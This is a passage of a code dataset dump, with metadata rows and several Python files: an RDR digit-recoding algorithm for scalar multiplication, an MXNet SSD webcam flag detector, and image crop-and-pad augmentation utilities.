intSrvFlowSenderAddr=intSrvFlowSenderAddr, QosService=QosService, SessionNumber=SessionNumber, intSrvObjects=intSrvObjects, intSrvGenObjects=intSrvGenObjects, intSrvFlowFlowId=intSrvFlowFlowId, intSrvCompliances=intSrvCompliances, intSrv=intSrv, intSrvFlowNumber=intSrvFlowNumber, intSrvNotifications=intSrvNotifications, intSrvFlowQueue=intSrvFlowQueue, intSrvFlowBestEffort=intSrvFlowBestEffort, intSrvFlowType=intSrvFlowType, intSrvCompliance=intSrvCompliance, Port=Port, intSrvIfAttribStatus=intSrvIfAttribStatus, intSrvFlowPoliced=intSrvFlowPoliced, intSrvFlowDiscard=intSrvFlowDiscard, intSrvGenObjectsGroup=intSrvGenObjectsGroup, intSrvConformance=intSrvConformance)
| true
| true
|
790b019a1dd927ca2c40f6dbe2c1d45b69a5be99
| 8,792
|
py
|
Python
|
Python/IFRA.py
|
iMohannad/Random_Recording_Algorithm
|
138113dab004fdaac36d91968a01d8e2c6e34681
|
[
"MIT"
] | null | null | null |
Python/IFRA.py
|
iMohannad/Random_Recording_Algorithm
|
138113dab004fdaac36d91968a01d8e2c6e34681
|
[
"MIT"
] | null | null | null |
Python/IFRA.py
|
iMohannad/Random_Recording_Algorithm
|
138113dab004fdaac36d91968a01d8e2c6e34681
|
[
"MIT"
] | null | null | null |
import math
import random
import time
def average_density(rdr):
countZeros = 0
length = 0
for i in rdr:
length = length + 1
if (i == 0):
countZeros = countZeros + 1
return [length - countZeros, length]
def check_rdr(rdr):
for i in range (0, len(rdr)-1):
if rdr[i] != 0 and rdr[i+1] != 0:
return False
return True
def generate_random_D(m, l):
if l > (m+1)/2:
raise ValueError("l should satisfy the condition l <= (m+1)/2")
D = []
for i in range(2, l+1, 1):
odd = False
while not odd:
x = random.randint(3, m)
if(x % 2 != 0 and x not in D):
odd = True
D.append(x)
D.sort()
D.insert(0, 1)
return D
def add_carry_revised(bin_k):
len_k = len(bin_k)
# convert bin_k to an array to allow change of one bit easily
bin_s = list(bin_k)
carry = '0'
# If k is empty, Then carry needs to be added last.
if (bin_k == ''):
return '1'
# If LSB is 0, we just add carry to make it one. If it's 1, we make it 0 and carry is set to 1
if(bin_k[len_k-1] == '0'):
bin_s[len_k-1] = '1'
else:
bin_s[len_k-1] = '0'
carry = '1'
# index is set to the second LSB
index = len_k-2
while carry == '1':
# if k was only 1 bit, we just append the carry
if index == -1:
carry = '0'
bin_s.insert(0, '1')
# if we reached the MSB and it's 1, then we make it 0 and append 1,
# if it is 0, it is just set to 1.
elif index == 0:
carry = '0'
if (bin_s[index] == '1'):
bin_s[index] = '0'
bin_s.insert(0, '1')
else:
bin_s[index] = '1'
# if the bit is neither of the last two cases, it's set to 1 when it is 0,
# or it is set to 0, and carry is still 1
elif(bin_k[index] == '0'):
bin_s[index] = '1'
carry = '0'
else:
bin_s[index] = '0'
# Update the index
index = index - 1
# bin_s is converted back to a variable
bin_k = "".join(bin_s)
return bin_k
def get_Wn(D):
return int(math.floor(math.log(max(D), 2)))
def RDR_algorithm(D, k):
rdr = []
bin_k = bin(k)[2:]
# get number of bits
Wn = get_Wn(D)
flag_d = 0
while bin_k != '':
# If k is even, zero is appended to rdr and k is shifted right 1 bit
if bin_k[len(bin_k)-1] == '0':
rdr.insert(0, 0)
bin_k = bin_k[:len(bin_k)-1]
continue
# if LSB is not 0, we extract w bits
for w in range(Wn + 1, 0, -1):
# if the window is bigger than the length of k, we need a smaller window
if (w > len(bin_k)):
continue
# we check every d in the digit set D
for d in D:
bin_d = bin(d)[2:] # get the binary representation of d
length_bin_d = len(bin_d)
# extract w bits from bin_k
k_reg = bin_k[len(bin_k) - w:]
# compute the negative residue of d, if neg_d is negative, it is ignored by setting it to 0.
neg_d = 2**w - d
while neg_d < 0:
neg_d = 0
neg_bin_d = bin(neg_d)[2:] # get the binary representation of neg_d
length_neg_bin_d = len(neg_bin_d)
# d (or its negative residue) can only be chosen when it matches the value of the extracted window; compare numerically so this also runs under Python 3
if d <= int(k_reg, 2) or neg_d == int(k_reg, 2):
if int(bin_d, 2) ^ int(k_reg, 2) == 0:
rdr.insert(0, d)
# inserting w-1 zeros
for j in range(0, w-1):
rdr.insert(0, 0)
# update k by shifting it right w bits
bin_k = bin_k[:len(bin_k) - w]
# set flag_d to 1 to set the window to Wn+1
flag_d = 1
break
elif int(neg_bin_d, 2) ^ int(k_reg, 2) == 0 and neg_d != 1:
rdr.insert(0, -d)
# Inserting zeros
for j in range(0, w-1):
rdr.insert(0, 0)
# update k by shifting it right w bits
bin_k = bin_k[:len(bin_k) - w]
# update k after adding a carry to LSB
bin_k = add_carry_revised(bin_k)
# set flag_d to 1 to set the window to Wn+1
flag_d = 1
break
# break out of the for loop to check if we finished k or not
if flag_d == 1:
flag_d = 0
break
# In the end, there might be some leading zeros which are not needed,
# this while loop removes the leading zeros and updates rdr accordingly
while (rdr[0] == 0):
rdr = rdr[1:]
# return the result, and length of result
return rdr
# this function returns the value of the rdr representation.
def check_num(rdr):
b = 1
sum = 0
for i in range(len(rdr)-1, -1, -1):
sum = sum + b*rdr[i]
b = b*2
return sum
def run_tests_time():
i = 10
j = 0
averageTime = 0
nist = [651056770906015076056810763456358567190100156695615665659,
2695995667150639794667015087019625940457807714424391721682712368051,
115792089210351248362697456949407573528996955234135760342422159061068512044339,
26959956671506397946670150870196259404578077144243917216827126959956671506397946670150870196259404578077144243917216,
2695995667150639794667015087019625940457807714424391721682712368058238947189273490172349807129834790127349087129834623486127461012630462184628923461201280461]
w = [5, 7, 9 , 11]
index_w = 0
index_nist = 0
while index_w < 1:
while index_nist < 5:
D = generate_random_D(2**w[index_w], 2**(w[index_w]-3)-1)
while j < 1000:
# print j
startTime = time.time()
rdr = RDR_algorithm(D, nist[index_nist])
endTime = time.time()
averageTime = averageTime + (endTime - startTime)
j = j+1
averageTime = averageTime / 1000
print "Average Time for NIST[", index_nist, "] and w = ", w[index_w], " = ", averageTime
averageTime = 0
j = 0
index_nist = index_nist +1
index_nist = 0
index_w = index_w + 1
if __name__ == '__main__':
# print "bin > ", bin(651056770906015076056810763456358567190100156695615665659)
# # run_tests_time()
# nist = [651056770906015076056810763456358567190100156695615665659,
# 2695995667150639794667015087019625940457807714424391721682712368051,
# 115792089210351248362697456949407573528996955234135760342422159061068512044339,
# 26959956671506397946670150870196259404578077144243917216827126959956671506397946670150870196259404578077144243917216,
# 2695995667150639794667015087019625940457807714424391721682712368058238947189273490172349807129834790127349087129834623486127461012630462184628923461201280461]
# D = [1, 7, 23, 25, 33, 37, 39, 43, 49, 53, 63, 65, 67, 71, 75, 77, 85, 89, 97, 99, 103, 107, 113, 115, 117, 119, 127, 131, 133, 135, 145, 151, 153, 157, 163, 165, 171, 181, 183, 185, 189, 191, 197, 199, 201, 203, 207, 211, 213, 219, 221, 225, 227, 229, 233, 235, 237, 243, 247, 255, 257, 259, 269, 283, 287, 295, 307, 311, 321, 329, 333, 335, 339, 341, 345, 349, 351, 371, 373, 381, 385, 393, 403, 405, 411, 419,421, 429, 431, 433, 435, 437, 441, 459, 471, 489, 503, 519, 521, 523, 527, 529, 535, 537, 543, 547, 549, 563, 567, 577, 585, 589, 601, 603, 609, 615, 619, 627, 633, 635, 641, 643, 655, 659, 665, 671, 675, 681, 687, 709, 711, 719, 727, 729, 731, 733, 735, 737, 741, 743, 745, 747, 749, 751, 755, 761, 763, 765, 771, 777, 779, 783, 785, 789, 797, 803, 807, 813, 817, 827, 839, 841, 845, 853, 859, 863, 865, 871, 873, 875, 883, 887, 889, 891, 895, 897, 899, 901, 905, 909, 915, 925, 927, 933, 935, 945, 949, 961, 963, 967, 977, 983, 985, 987, 989, 995]
# k = nist[4]
# rdr = RDR_algorithm(D, k)
# print "IFRA > ", rdr
rdr = RDR_algorithm([1, 3, 23, 27], 314154655)
print "RDR > ", rdr
print "Min_len > ", len(rdr)
print "IsRDR > ", check_rdr(rdr)
print "check > ", check_num(rdr)
| 42.679612
| 968
| 0.535942
|
import math
import random
import time
def average_density(rdr):
countZeros = 0
length = 0
for i in rdr:
length = length + 1
if (i == 0):
countZeros = countZeros + 1
return [length - countZeros, length]
def check_rdr(rdr):
for i in range (0, len(rdr)-1):
if rdr[i] != 0 and rdr[i+1] != 0:
return False
return True
def generate_random_D(m, l):
if l > (m+1)/2:
raise ValueError("l should satisfy the condition l <= (m+1)/2")
D = []
for i in range(2, l+1, 1):
odd = False
while not odd:
x = random.randint(3, m)
if(x % 2 != 0 and x not in D):
odd = True
D.append(x)
D.sort()
D.insert(0, 1)
return D
def add_carry_revised(bin_k):
len_k = len(bin_k)
bin_s = list(bin_k)
carry = '0'
if (bin_k == ''):
return '1'
if(bin_k[len_k-1] == '0'):
bin_s[len_k-1] = '1'
else:
bin_s[len_k-1] = '0'
carry = '1'
# index is set to the second LSB
index = len_k-2
while carry == '1':
# if k was only 1 bit, we just append the carry
if index == -1:
carry = '0'
bin_s.insert(0, '1')
# if we reached the MSB and it's 1, then we make it 0 and append 1,
elif index == 0:
carry = '0'
if (bin_s[index] == '1'):
bin_s[index] = '0'
bin_s.insert(0, '1')
else:
bin_s[index] = '1'
        # if the current bit is 0, it becomes 1 and the carry is absorbed
elif(bin_k[index] == '0'):
bin_s[index] = '1'
carry = '0'
else:
bin_s[index] = '0'
# Update the index
index = index - 1
    # bin_s is joined back into a string
bin_k = "".join(bin_s)
return bin_k
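# Illustrative cross-check (not used by the algorithm): for the strings handled
# here, which carry no leading zeros, adding a carry is just a binary increment.
def add_carry_simple(bin_k):
    return bin(int(bin_k, 2) + 1)[2:] if bin_k else '1'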
def get_Wn(D):
return int(math.floor(math.log(max(D), 2)))
def RDR_algorithm(D, k):
rdr = []
bin_k = bin(k)[2:]
# get number of bits
Wn = get_Wn(D)
flag_d = 0
while bin_k != '':
        # If k is even, zero is appended to rdr and k is shifted right 1 bit
if bin_k[len(bin_k)-1] == '0':
rdr.insert(0, 0)
bin_k = bin_k[:len(bin_k)-1]
continue
        # if the LSB is not 0, we extract w bits
for w in range(Wn + 1, 0, -1):
            # if the window is bigger than the length of k, try a smaller window
if (w > len(bin_k)):
continue
# we check every d in the digit set D
for d in D:
bin_d = bin(d)[2:] # get the binary representation of d
length_bin_d = len(bin_d)
# extract w bits from bin_k
k_reg = bin_k[len(bin_k) - w:]
# compute the negative residue of d, if neg_d is negative, it is ignored by setting it to 0.
neg_d = 2**w - d
                if neg_d < 0:
                    neg_d = 0
neg_bin_d = bin(neg_d)[2:] # get the binary representation of neg_d
length_neg_bin_d = len(neg_bin_d)
                # d cannot be chosen unless its value is no larger than the extracted window.
                if d <= int(k_reg, 2):
if int(bin_d, 2) ^ int(k_reg, 2) == 0:
rdr.insert(0, d)
# inserting w-1 zeros
for j in range(0, w-1):
rdr.insert(0, 0)
# update k by shifting it right w bits
bin_k = bin_k[:len(bin_k) - w]
# set flag_d to 1 to set the window to Wn+1
flag_d = 1
break
elif int(neg_bin_d, 2) ^ int(k_reg, 2) == 0 and neg_d != 1:
rdr.insert(0, -d)
# Inserting zeros
for j in range(0, w-1):
rdr.insert(0, 0)
# update k by shifting it right w bits
bin_k = bin_k[:len(bin_k) - w]
# update k after adding a carry to LSB
bin_k = add_carry_revised(bin_k)
# set flag_d to 1 to set the window to Wn+1
flag_d = 1
break
# break out of the for loop to check if we finished k or not
if flag_d == 1:
flag_d = 0
break
    # In the end there might be some leading zeros which are not needed;
    # this loop strips them from the front of rdr
while (rdr[0] == 0):
rdr = rdr[1:]
    # return the resulting representation
return rdr
# this function returns the value of the rdr representation.
def check_num(rdr):
b = 1
sum = 0
for i in range(len(rdr)-1, -1, -1):
sum = sum + b*rdr[i]
b = b*2
return sum
def run_tests_time():
i = 10
j = 0
averageTime = 0
nist = [651056770906015076056810763456358567190100156695615665659,
2695995667150639794667015087019625940457807714424391721682712368051,
115792089210351248362697456949407573528996955234135760342422159061068512044339,
26959956671506397946670150870196259404578077144243917216827126959956671506397946670150870196259404578077144243917216,
2695995667150639794667015087019625940457807714424391721682712368058238947189273490172349807129834790127349087129834623486127461012630462184628923461201280461]
w = [5, 7, 9 , 11]
index_w = 0
index_nist = 0
while index_w < 1:
while index_nist < 5:
D = generate_random_D(2**w[index_w], 2**(w[index_w]-3)-1)
while j < 1000:
# print j
startTime = time.time()
rdr = RDR_algorithm(D, nist[index_nist])
endTime = time.time()
averageTime = averageTime + (endTime - startTime)
j = j+1
averageTime = averageTime / 1000
print "Average Time for NIST[", index_nist, "] and w = ", w[index_w], " = ", averageTime
averageTime = 0
j = 0
index_nist = index_nist +1
index_nist = 0
index_w = index_w + 1
if __name__ == '__main__':
# print "bin > ", bin(651056770906015076056810763456358567190100156695615665659)
# # run_tests_time()
# nist = [651056770906015076056810763456358567190100156695615665659,
# 2695995667150639794667015087019625940457807714424391721682712368051,
# 115792089210351248362697456949407573528996955234135760342422159061068512044339,
# 26959956671506397946670150870196259404578077144243917216827126959956671506397946670150870196259404578077144243917216,
# 2695995667150639794667015087019625940457807714424391721682712368058238947189273490172349807129834790127349087129834623486127461012630462184628923461201280461]
# D = [1, 7, 23, 25, 33, 37, 39, 43, 49, 53, 63, 65, 67, 71, 75, 77, 85, 89, 97, 99, 103, 107, 113, 115, 117, 119, 127, 131, 133, 135, 145, 151, 153, 157, 163, 165, 171, 181, 183, 185, 189, 191, 197, 199, 201, 203, 207, 211, 213, 219, 221, 225, 227, 229, 233, 235, 237, 243, 247, 255, 257, 259, 269, 283, 287, 295, 307, 311, 321, 329, 333, 335, 339, 341, 345, 349, 351, 371, 373, 381, 385, 393, 403, 405, 411, 419,421, 429, 431, 433, 435, 437, 441, 459, 471, 489, 503, 519, 521, 523, 527, 529, 535, 537, 543, 547, 549, 563, 567, 577, 585, 589, 601, 603, 609, 615, 619, 627, 633, 635, 641, 643, 655, 659, 665, 671, 675, 681, 687, 709, 711, 719, 727, 729, 731, 733, 735, 737, 741, 743, 745, 747, 749, 751, 755, 761, 763, 765, 771, 777, 779, 783, 785, 789, 797, 803, 807, 813, 817, 827, 839, 841, 845, 853, 859, 863, 865, 871, 873, 875, 883, 887, 889, 891, 895, 897, 899, 901, 905, 909, 915, 925, 927, 933, 935, 945, 949, 961, 963, 967, 977, 983, 985, 987, 989, 995]
# k = nist[4]
# rdr = RDR_algorithm(D, k)
# print "IFRA > ", rdr
rdr = RDR_algorithm([1, 3, 23, 27], 314154655)
print "RDR > ", rdr
print "Min_len > ", len(rdr)
print "IsRDR > ", check_rdr(rdr)
print "check > ", check_num(rdr)
| false
| true
|
790b01b1c205b5dea6dd4f8d22dcd97188b5f521
| 4,031
|
py
|
Python
|
object_detection_app.py
|
Prasad9/Detect-Flags-SSD
|
c0d662bde99ed8df33d72bd06d61d5eb869d31a5
|
[
"MIT"
] | 13
|
2017-11-08T07:09:13.000Z
|
2022-03-28T07:09:47.000Z
|
object_detection_app.py
|
Prasad9/Detect-Flags-SSD
|
c0d662bde99ed8df33d72bd06d61d5eb869d31a5
|
[
"MIT"
] | 3
|
2018-03-08T04:30:19.000Z
|
2019-01-03T15:47:24.000Z
|
object_detection_app.py
|
Prasad9/Detect-Flags-SSD
|
c0d662bde99ed8df33d72bd06d61d5eb869d31a5
|
[
"MIT"
] | 5
|
2018-01-15T15:26:44.000Z
|
2021-08-18T08:02:51.000Z
|
import os
import cv2
import time
import argparse
import multiprocessing
import numpy as np
import tools.find_mxnet
import mxnet as mx
import sys
from detect.image_detector import ImageDetector
from symbol.symbol_factory import get_symbol
from utils import WebcamVideoStream
class_names = 'Argentina, Australia, Bhutan, Brazil, Canada, China, Cuba, France, Germany, Greece, India, \
Kenya, Mexico, Norway, Portugal, Saudi Arabia, South Africa, Sri Lanka, Sweden, Thailand, \
Turkey, Ukraine, U.A.E., U.K., U.S.A.'
detector = None
def get_detector(net, prefix, epoch, data_shape, mean_pixels, ctx, class_names, thresh, plot_confidence,
nms_thresh=0.5, force_nms=True, nms_topk=400):
if net is not None:
net = get_symbol(net, data_shape, num_classes=len(class_names), nms_thresh=nms_thresh,
force_nms=force_nms, nms_topk=nms_topk)
detector = ImageDetector(net, prefix, epoch, data_shape, mean_pixels, class_names, thresh,\
plot_confidence, ctx=ctx)
return detector
def process_image(image_frame):
# run detection
detected_img = detector.detect_and_layover_image(image_frame, False)
return detected_img
def parse_args():
parser = argparse.ArgumentParser(description='Detect objects in the live video')
parser.add_argument('--network', dest='network', type=str, default='vgg16_reduced',
help='which network to use')
parser.add_argument('--epoch', dest='epoch', help='epoch of pretrained model',
default=1, type=int)
parser.add_argument('--prefix', dest='prefix', help='Trained model prefix',
default=os.path.join(os.getcwd(), 'model', 'ssd'), type=str)
parser.add_argument('--thresh', dest='thresh', help='Threshold of confidence level',
default=0.43, type=float)
parser.add_argument('--plot-prob', dest='plot_prob', help='Should probabilities be printed. (1 = Yes, 0 = No)',
default=1, type=int)
parser.add_argument('--nms', dest='nms_thresh', type=float, default=0.45,
help='non-maximum suppression threshold')
parser.add_argument('--mean-r', dest='mean_r', type=float, default=123,
help='red mean value')
parser.add_argument('--mean-g', dest='mean_g', type=float, default=117,
help='green mean value')
parser.add_argument('--mean-b', dest='mean_b', type=float, default=104,
help='blue mean value')
parser.add_argument('--data-shape', dest='data_shape', type=int, default=300,
help='set image shape')
parser.add_argument('--class-names', dest='class_names', type=str,
default = class_names, help='string of comma separated names')
parser.add_argument('--force', dest='force_nms', type=bool, default=True,
help='force non-maximum suppression on different class')
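    # note: argparse's type=bool turns any non-empty string (including 'False') into
    # True; only an empty string yields False, so '--force False' still enables it.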
parser.add_argument('--has-gpu', dest='gpu', help='GPU device 1 if present else 0',
default=1, type=int)
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=480, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=640, help='Height of the frames in the video stream.')
args = parser.parse_args()
return args
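# Example invocation (model path, camera index and threshold are placeholders):
#   python object_detection_app.py --network vgg16_reduced --epoch 1 \
#       --prefix ./model/ssd --has-gpu 0 --source 0 --thresh 0.43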
if __name__ == '__main__':
args = parse_args()
color_subtract = (args.mean_r, args.mean_g, args.mean_b)
ctx = mx.gpu(0) if args.gpu == 1 else mx.cpu(0)
class_names = [class_name.strip() for class_name in args.class_names.split(',')]
detector = get_detector(args.network, args.prefix, args.epoch, args.data_shape, color_subtract, ctx,
class_names, args.thresh, args.plot_prob, args.nms_thresh, args.force_nms)
video_capture = WebcamVideoStream(src=args.video_source,
width=args.width,
height=args.height).start()
while True:
frame = video_capture.read()
detected_img = process_image(frame)
cv2.imshow('Video', detected_img)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.stop()
cv2.destroyAllWindows()
| 41.556701
| 112
| 0.711734
|
import os
import cv2
import time
import argparse
import multiprocessing
import numpy as np
import tools.find_mxnet
import mxnet as mx
import sys
from detect.image_detector import ImageDetector
from symbol.symbol_factory import get_symbol
from utils import WebcamVideoStream
class_names = 'Argentina, Australia, Bhutan, Brazil, Canada, China, Cuba, France, Germany, Greece, India, \
Kenya, Mexico, Norway, Portugal, Saudi Arabia, South Africa, Sri Lanka, Sweden, Thailand, \
Turkey, Ukraine, U.A.E., U.K., U.S.A.'
detector = None
def get_detector(net, prefix, epoch, data_shape, mean_pixels, ctx, class_names, thresh, plot_confidence,
nms_thresh=0.5, force_nms=True, nms_topk=400):
if net is not None:
net = get_symbol(net, data_shape, num_classes=len(class_names), nms_thresh=nms_thresh,
force_nms=force_nms, nms_topk=nms_topk)
detector = ImageDetector(net, prefix, epoch, data_shape, mean_pixels, class_names, thresh,\
plot_confidence, ctx=ctx)
return detector
def process_image(image_frame):
detected_img = detector.detect_and_layover_image(image_frame, False)
return detected_img
def parse_args():
parser = argparse.ArgumentParser(description='Detect objects in the live video')
parser.add_argument('--network', dest='network', type=str, default='vgg16_reduced',
help='which network to use')
parser.add_argument('--epoch', dest='epoch', help='epoch of pretrained model',
default=1, type=int)
parser.add_argument('--prefix', dest='prefix', help='Trained model prefix',
default=os.path.join(os.getcwd(), 'model', 'ssd'), type=str)
parser.add_argument('--thresh', dest='thresh', help='Threshold of confidence level',
default=0.43, type=float)
parser.add_argument('--plot-prob', dest='plot_prob', help='Should probabilities be printed. (1 = Yes, 0 = No)',
default=1, type=int)
parser.add_argument('--nms', dest='nms_thresh', type=float, default=0.45,
help='non-maximum suppression threshold')
parser.add_argument('--mean-r', dest='mean_r', type=float, default=123,
help='red mean value')
parser.add_argument('--mean-g', dest='mean_g', type=float, default=117,
help='green mean value')
parser.add_argument('--mean-b', dest='mean_b', type=float, default=104,
help='blue mean value')
parser.add_argument('--data-shape', dest='data_shape', type=int, default=300,
help='set image shape')
parser.add_argument('--class-names', dest='class_names', type=str,
default = class_names, help='string of comma separated names')
parser.add_argument('--force', dest='force_nms', type=bool, default=True,
help='force non-maximum suppression on different class')
parser.add_argument('--has-gpu', dest='gpu', help='GPU device 1 if present else 0',
default=1, type=int)
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=480, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=640, help='Height of the frames in the video stream.')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
color_subtract = (args.mean_r, args.mean_g, args.mean_b)
ctx = mx.gpu(0) if args.gpu == 1 else mx.cpu(0)
class_names = [class_name.strip() for class_name in args.class_names.split(',')]
detector = get_detector(args.network, args.prefix, args.epoch, args.data_shape, color_subtract, ctx,
class_names, args.thresh, args.plot_prob, args.nms_thresh, args.force_nms)
video_capture = WebcamVideoStream(src=args.video_source,
width=args.width,
height=args.height).start()
while True:
frame = video_capture.read()
detected_img = process_image(frame)
cv2.imshow('Video', detected_img)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.stop()
cv2.destroyAllWindows()
| true
| true
|
790b01d343e3c9f073136f2bbba4dff70bc167a1
| 7,604
|
py
|
Python
|
data/crop_and_pad_augmentations.py
|
rexxxx1234/SAUNet-demo
|
20e968e1d42217c89cdf4fc304ed2d8717697eec
|
[
"BSD-3-Clause"
] | 81
|
2020-01-22T20:26:36.000Z
|
2022-03-03T09:34:17.000Z
|
data/crop_and_pad_augmentations.py
|
saunetcvpr2020/shape-attentive-unet
|
c309fd705fd7b572c80813ab688cc594ed026ad7
|
[
"BSD-3-Clause"
] | 10
|
2020-04-22T15:47:11.000Z
|
2021-09-05T02:24:41.000Z
|
data/crop_and_pad_augmentations.py
|
rexxxx1234/SAUNet-demo
|
20e968e1d42217c89cdf4fc304ed2d8717697eec
|
[
"BSD-3-Clause"
] | 18
|
2020-01-23T07:24:35.000Z
|
2021-09-17T08:46:09.000Z
|
# Copyright 2017 Division of Medical Image Computing, German Cancer Research Center (DKFZ)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import range
import numpy as np
from batchgenerators.augmentations.utils import pad_nd_image
def center_crop(data, crop_size, seg=None):
return crop(data, seg, crop_size, 0, 'center')
def get_lbs_for_random_crop(crop_size, data_shape, margins):
"""
:param crop_size:
:param data_shape: (b,c,x,y(,z)) must be the whole thing!
:param margins:
:return:
"""
lbs = []
for i in range(len(data_shape) - 2):
if data_shape[i+2] - crop_size[i] - margins[i] > margins[i]:
lbs.append(np.random.randint(margins[i], data_shape[i+2] - crop_size[i] - margins[i]))
else:
lbs.append((data_shape[i+2] - crop_size[i]) // 2)
return lbs
def get_lbs_for_center_crop(crop_size, data_shape):
"""
:param crop_size:
:param data_shape: (b,c,x,y(,z)) must be the whole thing!
:return:
"""
lbs = []
for i in range(len(data_shape) - 2):
lbs.append((data_shape[i + 2] - crop_size[i]) // 2)
return lbs
def crop(data, seg=None, crop_size=128, margins=(0, 0, 0), crop_type="center",
pad_mode='constant', pad_kwargs={'constant_values': 0},
pad_mode_seg='constant', pad_kwargs_seg={'constant_values': 0}):
"""
crops data and seg (seg may be None) to crop_size. Whether this will be achieved via center or random crop is
    determined by crop_type. Margin will be respected only for random_crop and will prevent the crops from being closer
than margin to the respective image border. crop_size can be larger than data_shape - margin -> data/seg will be
padded with zeros in that case. margins can be negative -> results in padding of data/seg followed by cropping with
margin=0 for the appropriate axes
:param data: b, c, x, y(, z)
:param seg:
:param crop_size:
:param margins: distance from each border, can be int or list/tuple of ints (one element for each dimension).
Can be negative (data/seg will be padded if needed)
:param crop_type: random or center
:return:
"""
if not isinstance(data, (list, tuple, np.ndarray)):
raise TypeError("data has to be either a numpy array or a list")
data_shape = tuple([len(data)] + list(data[0].shape))
data_dtype = data[0].dtype
dim = len(data_shape) - 2
if seg is not None:
seg_shape = tuple([len(seg)] + list(seg[0].shape))
seg_dtype = seg[0].dtype
if not isinstance(seg, (list, tuple, np.ndarray)):
raise TypeError("data has to be either a numpy array or a list")
assert all([i == j for i, j in zip(seg_shape[2:], data_shape[2:])]), "data and seg must have the same spatial " \
"dimensions. Data: %s, seg: %s" % \
(str(data_shape), str(seg_shape))
if type(crop_size) not in (tuple, list, np.ndarray):
crop_size = [crop_size] * dim
else:
assert len(crop_size) == len(
data_shape) - 2, "If you provide a list/tuple as center crop make sure it has the same dimension as your " \
"data (2d/3d)"
if not isinstance(margins, (np.ndarray, tuple, list)):
margins = [margins] * dim
data_return = np.zeros([data_shape[0], data_shape[1]] + list(crop_size), dtype=data_dtype)
if seg is not None:
seg_return = np.zeros([seg_shape[0], seg_shape[1]] + list(crop_size), dtype=seg_dtype)
else:
seg_return = None
for b in range(data_shape[0]):
data_shape_here = [data_shape[0]] + list(data[b].shape)
if seg is not None:
seg_shape_here = [seg_shape[0]] + list(seg[b].shape)
if crop_type == "center":
lbs = get_lbs_for_center_crop(crop_size, data_shape_here)
elif crop_type == "random":
lbs = get_lbs_for_random_crop(crop_size, data_shape_here, margins)
else:
raise NotImplementedError("crop_type must be either center or random")
need_to_pad = [[0, 0]] + [[abs(min(0, lbs[d])),
abs(min(0, data_shape_here[d + 2] - (lbs[d] + crop_size[d])))]
for d in range(dim)]
# we should crop first, then pad -> reduces i/o for memmaps, reduces RAM usage and improves speed
ubs = [min(lbs[d] + crop_size[d], data_shape_here[d+2]) for d in range(dim)]
lbs = [max(0, lbs[d]) for d in range(dim)]
slicer_data = [slice(0, data_shape_here[1])] + [slice(lbs[d], ubs[d]) for d in range(dim)]
data_cropped = data[b][tuple(slicer_data)]
if seg_return is not None:
slicer_seg = [slice(0, seg_shape_here[1])] + [slice(lbs[d], ubs[d]) for d in range(dim)]
seg_cropped = seg[b][tuple(slicer_seg)]
if any([i > 0 for j in need_to_pad for i in j]):
data_return[b] = np.pad(data_cropped, need_to_pad, pad_mode, **pad_kwargs)
if seg_return is not None:
seg_return[b] = np.pad(seg_cropped, need_to_pad, pad_mode_seg, **pad_kwargs_seg)
else:
data_return[b] = data_cropped
if seg_return is not None:
seg_return[b] = seg_cropped
return data_return, seg_return
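# Illustrative usage sketch (added for clarity, not part of the original module):
# crop a toy batch once with a center crop and once with a random crop.
def _example_crop_usage():
    data = np.random.rand(2, 1, 96, 96)                      # b, c, x, y
    seg = np.random.randint(0, 2, size=(2, 1, 96, 96))
    d_center, s_center = crop(data, seg, crop_size=64, crop_type="center")
    d_random, s_random = crop(data, seg, crop_size=64, margins=(8, 8), crop_type="random")
    assert d_center.shape == (2, 1, 64, 64) and s_random.shape == (2, 1, 64, 64)
    return d_center, s_center, d_random, s_random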
def random_crop(data, seg=None, crop_size=128, margins=[0, 0, 0]):
return crop(data, seg, crop_size, margins, 'random')
def pad_nd_image_and_seg(data, seg, new_shape=None, must_be_divisible_by=None, pad_mode_data='constant',
np_pad_kwargs_data=None, pad_mode_seg='constant', np_pad_kwargs_seg=None):
"""
    Pads data and seg to new_shape. new_shape is thereby understood as min_shape (if data/seg is already larger than
new_shape the shape stays the same for the dimensions this applies)
:param data:
:param seg:
:param new_shape: if none then only must_be_divisible_by is applied
    :param must_be_divisible_by: UNet like architectures sometimes require the input to be divisible by some number. This
    will modify new_shape if new_shape is not divisible by this (by increasing it accordingly).
must_be_divisible_by should be a list of int (one for each spatial dimension) and this list must have the same
length as new_shape
:param pad_mode_data: see np.pad
:param np_pad_kwargs_data:see np.pad
:param pad_mode_seg:see np.pad
:param np_pad_kwargs_seg:see np.pad
:return:
"""
sample_data = pad_nd_image(data, new_shape, mode=pad_mode_data, kwargs=np_pad_kwargs_data,
return_slicer=False, shape_must_be_divisible_by=must_be_divisible_by)
if seg is not None:
sample_seg = pad_nd_image(seg, new_shape, mode=pad_mode_seg, kwargs=np_pad_kwargs_seg,
return_slicer=False, shape_must_be_divisible_by=must_be_divisible_by)
else:
sample_seg = None
return sample_data, sample_seg
| 44.209302
| 121
| 0.642951
|
from builtins import range
import numpy as np
from batchgenerators.augmentations.utils import pad_nd_image
def center_crop(data, crop_size, seg=None):
return crop(data, seg, crop_size, 0, 'center')
def get_lbs_for_random_crop(crop_size, data_shape, margins):
lbs = []
for i in range(len(data_shape) - 2):
if data_shape[i+2] - crop_size[i] - margins[i] > margins[i]:
lbs.append(np.random.randint(margins[i], data_shape[i+2] - crop_size[i] - margins[i]))
else:
lbs.append((data_shape[i+2] - crop_size[i]) // 2)
return lbs
def get_lbs_for_center_crop(crop_size, data_shape):
lbs = []
for i in range(len(data_shape) - 2):
lbs.append((data_shape[i + 2] - crop_size[i]) // 2)
return lbs
